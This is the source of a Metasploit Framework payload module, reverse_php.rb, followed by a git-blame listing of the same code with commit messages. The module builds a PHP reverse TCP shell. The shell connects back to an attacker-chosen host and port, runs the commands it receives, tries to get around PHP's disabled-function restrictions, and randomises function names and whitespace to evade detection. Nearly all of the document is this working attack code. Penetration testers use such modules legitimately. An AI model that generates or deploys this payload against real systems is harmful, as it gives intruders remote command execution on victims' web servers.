modules/payloads/singles/php/reverse_php.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

	include Msf::Payload::Single
	include Msf::Payload::Php
	include Msf::Sessions::CommandShellOptions

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'PHP Command Shell, Reverse TCP (via PHP)',
			'Description'   => 'Reverse PHP connect back shell with checks for disabled functions',
			'Author'        => 'egypt',
			'License'       => BSD_LICENSE,
			'Platform'      => 'php',
			'Arch'          => ARCH_PHP,
			'Handler'       => Msf::Handler::ReverseTcp,
			'Session'       => Msf::Sessions::CommandShell,
			'PayloadType'   => 'cmd',
			'Payload'       =>
				{
					'Offsets' => { },
					'Payload' => ''
				}
			))
	end

	#
	# Issues
	#   - Since each command is executed in a new shell, 'cd' does nothing.
	#      Perhaps it should be special-cased to call chdir()
	#   - Tries to get around disable_functions but makes no attempts to
	#      circumvent safe mode.
	#
	def php_reverse_shell

		if (!datastore['LHOST'] or datastore['LHOST'].empty?)
			# datastore is empty on msfconsole startup
			ipaddr = '127.0.0.1'
			port = 4444
		else
			ipaddr = datastore['LHOST']
			port = datastore['LPORT']
		end
		exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)

		uri = "tcp://#{ipaddr}"
		socket_family = "AF_INET"

		if Rex::Socket.is_ipv6?(ipaddr)
			uri = "tcp://[#{ipaddr}]"
			socket_family = "AF_INET6"
		end

		shell=<<-END_OF_PHP_CODE
		$ipaddr='#{ipaddr}';
		$port=#{port};
		#{php_preamble({:disabled_varname => "$dis"})}

		if(!function_exists('#{exec_funcname}')){
			function #{exec_funcname}($c){
				global $dis;
				#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}
				return $o;
			}
		}
		$nofuncs='no exec functions';
		if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){
			$s=@fsockopen("#{uri}",$port);
			while($c=fread($s,2048)){
				$out = '';
				if(substr($c,0,3) == 'cd '){
					chdir(substr($c,3,-1));
				} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
					break;
				}else{
					$out=#{exec_funcname}(substr($c,0,-1));
					if($out===false){
						fwrite($s,$nofuncs);
						break;
					}
				}
				fwrite($s,$out);
			}
			fclose($s);
		}else{
			$s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);
			@socket_connect($s,$ipaddr,$port);
			@socket_write($s,"socket_create");
			while($c=@socket_read($s,2048)){
				$out = '';
				if(substr($c,0,3) == 'cd '){
					chdir(substr($c,3,-1));
				} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') {
					break;
				}else{
					$out=#{exec_funcname}(substr($c,0,-1));
					if($out===false){
						@socket_write($s,$nofuncs);
						break;
					}
				}
				@socket_write($s,$out,strlen($out));
			}
			@socket_close($s);
		}
		END_OF_PHP_CODE

		# randomize the spaces a bit
		Rex::Text.randomize_space(shell)

		return shell
	end

	#
	# Constructs the payload
	#
	def generate
		return super + php_reverse_shell
	end

end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`# This file is part of the Metasploit Framework and may be subject to`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-20 19:40:50 -06:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

new payloads from diaul 2006-12-18 22:06:19 +00:00			`require 'msf/core'`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`require 'msf/core/payload/php'`
new payloads from diaul 2006-12-18 22:06:19 +00:00			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
new payloads from diaul 2006-12-18 22:06:19 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`module Metasploit3`
new payloads from diaul 2006-12-18 22:06:19 +00:00
			`include Msf::Payload::Single`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`include Msf::Payload::Php`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`include Msf::Sessions::CommandShellOptions`
new payloads from diaul 2006-12-18 22:06:19 +00:00
			`def initialize(info = {})`
			`super(merge_info(info,`
Comply with msftidy 2012-08-07 15:59:01 -05:00			`'Name' => 'PHP Command Shell, Reverse TCP (via PHP)',`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`'Description' => 'Reverse PHP connect back shell with checks for disabled functions',`
fix author field 2009-04-30 06:10:12 +00:00			`'Author' => 'egypt',`
new payloads from diaul 2006-12-18 22:06:19 +00:00			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`

More reliable reverse shell 2008-03-04 07:34:26 +00:00			`#`
			`# Issues`
			`# - Since each command is executed in a new shell, 'cd' does nothing.`
			`# Perhaps it should be special-cased to call chdir()`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00			`# - Tries to get around disable_functions but makes no attempts to`
			`# circumvent safe mode.`
new payloads from diaul 2006-12-18 22:06:19 +00:00			`#`
			`def php_reverse_shell`
Updates from diaul 2007-02-04 01:53:43 +00:00
Fix empty LHOST problem and space generation 2008-03-04 20:50:39 +00:00			`if (!datastore['LHOST'] or datastore['LHOST'].empty?)`
Really fix the empty LHOST bug 2008-03-04 21:40:04 +00:00			`# datastore is empty on msfconsole startup`
Merge in additional IPv6 support for PHP payloads 2012-01-31 01:11:55 -06:00			`ipaddr = '127.0.0.1'`
Really fix the empty LHOST bug 2008-03-04 21:40:04 +00:00			`port = 4444`
			`else`
Merge in additional IPv6 support for PHP payloads 2012-01-31 01:11:55 -06:00			`ipaddr = datastore['LHOST']`
Really fix the empty LHOST bug 2008-03-04 21:40:04 +00:00			`port = datastore['LPORT']`
Fix empty LHOST problem and space generation 2008-03-04 20:50:39 +00:00			`end`
actually randomize myexec function name 2008-10-13 05:31:36 +00:00			`exec_funcname = Rex::Text.rand_text_alpha(rand(10)+5)`
Massive whitespace destruction 2012-06-06 00:22:36 -05:00
Merge in additional IPv6 support for PHP payloads 2012-01-31 01:11:55 -06:00			`uri = "tcp://#{ipaddr}"`
			`socket_family = "AF_INET"`

			`if Rex::Socket.is_ipv6?(ipaddr)`
			`uri = "tcp://[#{ipaddr}]"`
			`socket_family = "AF_INET6"`
Comply with msftidy 2012-08-07 15:59:01 -05:00			`end`
More reliable reverse shell 2008-03-04 07:34:26 +00:00
			`shell=<<-END_OF_PHP_CODE`
quoting ip to avoid php complaining 2012-06-25 18:52:26 +02:00			`$ipaddr='#{ipaddr}';`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`$port=#{port};`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`#{php_preamble({:disabled_varname => "$dis"})}`

actually randomize myexec function name 2008-10-13 05:31:36 +00:00			`if(!function_exists('#{exec_funcname}')){`
			`function #{exec_funcname}($c){`
make cd work by special-casing it to call chdir() 2009-09-10 06:11:47 +00:00			`global $dis;`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`#{php_system_block({:cmd_varname => "$c", :disabled_varname => "$dis", :output_varname => "$o"})}`
make cd work by special-casing it to call chdir() 2009-09-10 06:11:47 +00:00			`return $o;`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`}`
			`}`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`$nofuncs='no exec functions';`
			`if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){`
Merge in additional IPv6 support for PHP payloads 2012-01-31 01:11:55 -06:00			`$s=@fsockopen("#{uri}",$port);`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`while($c=fread($s,2048)){`
make cd work by special-casing it to call chdir() 2009-09-10 06:11:47 +00:00			`$out = '';`
			`if(substr($c,0,3) == 'cd '){`
			`chdir(substr($c,3,-1));`
			`} else if (substr($c,0,4) == 'quit' \|\| substr($c,0,4) == 'exit') {`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`break;`
make cd work by special-casing it to call chdir() 2009-09-10 06:11:47 +00:00			`}else{`
			`$out=#{exec_funcname}(substr($c,0,-1));`
			`if($out===false){`
			`fwrite($s,$nofuncs);`
			`break;`
			`}`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`fwrite($s,$out);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`fclose($s);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}else{`
Merge in additional IPv6 support for PHP payloads 2012-01-31 01:11:55 -06:00			`$s=@socket_create(#{socket_family},SOCK_STREAM,SOL_TCP);`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`@socket_connect($s,$ipaddr,$port);`
			`@socket_write($s,"socket_create");`
			`while($c=@socket_read($s,2048)){`
make cd work by special-casing it to call chdir() 2009-09-10 06:11:47 +00:00			`$out = '';`
			`if(substr($c,0,3) == 'cd '){`
			`chdir(substr($c,3,-1));`
			`} else if (substr($c,0,4) == 'quit' \|\| substr($c,0,4) == 'exit') {`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`break;`
make cd work by special-casing it to call chdir() 2009-09-10 06:11:47 +00:00			`}else{`
			`$out=#{exec_funcname}(substr($c,0,-1));`
			`if($out===false){`
			`@socket_write($s,$nofuncs);`
			`break;`
			`}`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`@socket_write($s,$out,strlen($out));`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
avoid logging socket errors 2008-09-04 03:52:02 +00:00			`@socket_close($s);`
More reliable reverse shell 2008-03-04 07:34:26 +00:00			`}`
			`END_OF_PHP_CODE`
new payloads from diaul 2006-12-18 22:06:19 +00:00
Fix empty LHOST problem and space generation 2008-03-04 20:50:39 +00:00			`# randomize the spaces a bit`
initial commit of browser_autopwn; 2008-07-01 01:44:56 +00:00			`Rex::Text.randomize_space(shell)`
new payloads from diaul 2006-12-18 22:06:19 +00:00
			`return shell`
			`end`

			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return super + php_reverse_shell`
			`end`
adds scripting for command shell sessions 2010-02-24 01:19:59 +00:00
fix author field 2009-04-30 06:10:12 +00:00			`end`